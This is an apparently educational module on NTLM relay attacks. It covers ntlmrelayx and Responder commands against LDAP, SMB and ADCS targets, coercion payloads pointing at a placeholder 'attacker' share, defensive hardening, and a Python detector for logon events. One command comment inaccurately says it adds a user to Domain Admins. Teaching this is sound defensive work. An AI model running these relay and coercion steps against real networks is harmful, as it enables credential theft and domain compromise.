NTLM relay is one of the most effective attacks against modern Windows environments, and it works even on fully patched systems if defenders haven't enabled specific hardening. This module covers how relay works, common exploit chains, and the defences that actually block it.
## How NTLM authentication works

NTLM is a challenge-response protocol. The client sends NTLM_NEGOTIATE; the server responds with a CHALLENGE containing a random nonce; the client computes a keyed hash over that challenge, using a key derived from its password hash, and returns it in NTLM_AUTHENTICATE; the server verifies the response.

Critical design flaw: NTLM does not verify to WHOM the client is authenticating. Nothing in the client's response identifies the server the client intended to reach, so if an attacker can get the client to initiate NTLM auth to the attacker's server, the attacker can relay the messages to a different server and impersonate the client there.
## The classic attack chain

1. Attacker on the network runs Responder or ntlmrelayx
2. Victim tries to resolve a mistyped hostname and gets the attacker's IP
3. Victim sends NTLM auth to the attacker
4. Attacker relays it to a target server (file share, MSSQL, LDAP, IIS)
5. Attacker is now authenticated as the victim on the target
## Exploitation tools

```shell
# Responder: listens and poisons LLMNR/NBT-NS
responder -I eth0 -wFv

# ntlmrelayx: relays captured NTLM to target
ntlmrelayx.py -tf targets.txt -smb2support

# Relay to LDAP to add user to Domain Admins
ntlmrelayx.py -t ldap://dc.corp.com --add-computer ATTACKER

# Relay to ADCS (PetitPotam + ADCS = domain admin)
ntlmrelayx.py -t http://ca.corp.com/certsrv/certfnsh.asp --adcs --template DomainController
```
## Coercion methods

Instead of waiting for accidental auth, attackers force it via:

- PetitPotam: abuses MS-EFSRPC to force a DC to authenticate
- PrintNightmare / PrinterBug: the Print Spooler service can be tricked into authenticating
- DFSCoerce: abuses MS-DFSNM
- Link-local: malicious file paths in emails and docs (UNC: `\\attacker\share`)
- WebDAV: `<img src="file://\\attacker\share">` in HTML
## Defences that actually block NTLM relay

- SMB signing required on DCs and servers. Every SMB packet must be signed with a session key derived from the user's credential; the relaying attacker never obtains that key, so the relayed session is rejected
- LDAP signing required: the same for LDAP
- Channel binding (EPA, Extended Protection for Authentication): HTTP/LDAPS verifies the TLS channel binding, preventing relay across different channels
- Disable NTLM entirely (GPO setting): the enterprise goal, but it requires AD hygiene
- Disable LLMNR, NBT-NS and mDNS: kills the poisoning vector
- Kerberos-only for critical services: relay doesn't work against Kerberos
- Smart card / Windows Hello for Business: eliminates NTLM primary auth
## Sysmon + detection rules

- Event 4624 with LogonType 3 from unexpected source IPs
- Event 4648 (explicit credentials) from machine accounts to sensitive targets
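As an added example (not part of this module), the two rules above as Python run over constructed sample events. The field names (EventID, LogonType, AuthenticationPackageName, IpAddress, SubjectUserName, TargetServerName) match the Windows Security log, but the sample lines, the expected-client networks and the sensitive-target list are placeholders I made up; in practice the events would arrive from an event-forwarding pipeline as XML or JSON rather than key=value text.

```python
import ipaddress

# Placeholders for this example: where NTLM network logons are expected from, and which
# hosts count as sensitive targets for explicit-credential use (ADCS, DCs, ...).
EXPECTED_CLIENT_NETS = [ipaddress.ip_network("10.1.0.0/16")]
SENSITIVE_TARGETS = {"ca.corp.example", "dc01.corp.example"}

# Constructed sample events (not real logs): one event per line, key=value pairs.
SAMPLE_LOG = """\
EventID=4624 Computer=FILES01 LogonType=3 AuthenticationPackageName=NTLM TargetUserName=jdoe IpAddress=10.1.5.23
EventID=4624 Computer=FILES01 LogonType=3 AuthenticationPackageName=NTLM TargetUserName=jdoe IpAddress=10.9.99.7
EventID=4624 Computer=FILES01 LogonType=3 AuthenticationPackageName=Kerberos TargetUserName=jdoe IpAddress=10.9.99.7
EventID=4624 Computer=FILES01 LogonType=3 AuthenticationPackageName=NTLM TargetUserName=svc_scan IpAddress=-
EventID=4648 Computer=WS042 SubjectUserName=DC01$ TargetUserName=svc_backup TargetServerName=ca.corp.example IpAddress=10.9.99.7
EventID=4648 Computer=WS042 SubjectUserName=jdoe TargetUserName=jdoe TargetServerName=files01.corp.example IpAddress=10.1.5.23
"""


def parse_events(text: str):
    """Parse key=value lines into dicts (values in this constructed sample contain no spaces)."""
    events = []
    for line in text.splitlines():
        if line.strip():
            events.append(dict(pair.split("=", 1) for pair in line.split()))
    return events


def detect(events):
    """Apply the two rules from the module and return one alert dict per hit."""
    alerts = []
    for ev in events:
        eid = ev.get("EventID")
        # Rule 1: NTLM network logon (type 3) from a source outside the expected client networks.
        # A relayed logon looks like an ordinary NTLM network logon on the target; the source IP is the relay host.
        if eid == "4624" and ev.get("LogonType") == "3" and ev.get("AuthenticationPackageName") == "NTLM":
            try:
                ip = ipaddress.ip_address(ev.get("IpAddress", "-"))
            except ValueError:
                continue  # "-" (local/unknown) carries no usable source; not an error, just no verdict
            if not any(ip in net for net in EXPECTED_CLIENT_NETS):
                alerts.append({"rule": "ntlm_network_logon_unexpected_source", "host": ev.get("Computer"),
                               "user": ev.get("TargetUserName"), "ip": str(ip)})
        # Rule 2: a machine account (name ends in $) using explicit credentials against a sensitive target.
        elif eid == "4648" and ev.get("SubjectUserName", "").endswith("$"):
            target = ev.get("TargetServerName", "").lower()
            if target in SENSITIVE_TARGETS:
                alerts.append({"rule": "machine_account_explicit_creds_to_sensitive_target", "host": ev.get("Computer"),
                               "subject": ev["SubjectUserName"], "target": target})
    return alerts


if __name__ == "__main__":
    for alert in detect(parse_events(SAMPLE_LOG)):
        print(alert)
```

On the sample, only the NTLM logon from 10.9.99.7 and the DC01$ explicit-credential use against the CA fire; the Kerberos logon from the same address and the event with a "-" source are ignored, which is why the NTLM rule checks AuthenticationPackageName and tolerates unparsable addresses instead of treating them as hits.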